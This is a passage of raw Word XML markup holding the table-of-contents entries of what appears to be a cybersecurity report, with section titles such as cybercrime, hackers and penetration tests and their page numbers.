            <w:r w:rsidR="00F93DB2" w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ABSTRACT</w:t>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190687 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00F93DB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5955E0C1" w14:textId="332CBCBE" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190688" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LIST OF FIGURES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E9C28CD" w14:textId="47BC1085" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190689" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LIST OF TABLES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57D60E66" w14:textId="23841C38" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190690" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 1: INTRODUCTION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49F3354C" w14:textId="486370AF" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190691" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The Internet and Cybercrime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12508113" w14:textId="38CA39AF" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190692" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cybercriminals and Hackers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35746EEC" w14:textId="7BEDB736" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190693" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cyber Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ED03657" w14:textId="0E68CE0C" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190694" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Aim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24C182F2" w14:textId="407BFFCA" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190695" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objectives</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EC94180" w14:textId="4DE1F801" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190696" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Project Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79E29F31" w14:textId="1A75F61E" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190697" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="060216E3" w14:textId="3FE9DD86" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190698" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 2: RESEARCH AND LITERATURE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1934AE27" w14:textId="515EC352" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190699" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190699 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1509BDAD" w14:textId="1AADBFD9" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190700" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Penetration Tests and Vulnerability Scans</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190700 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
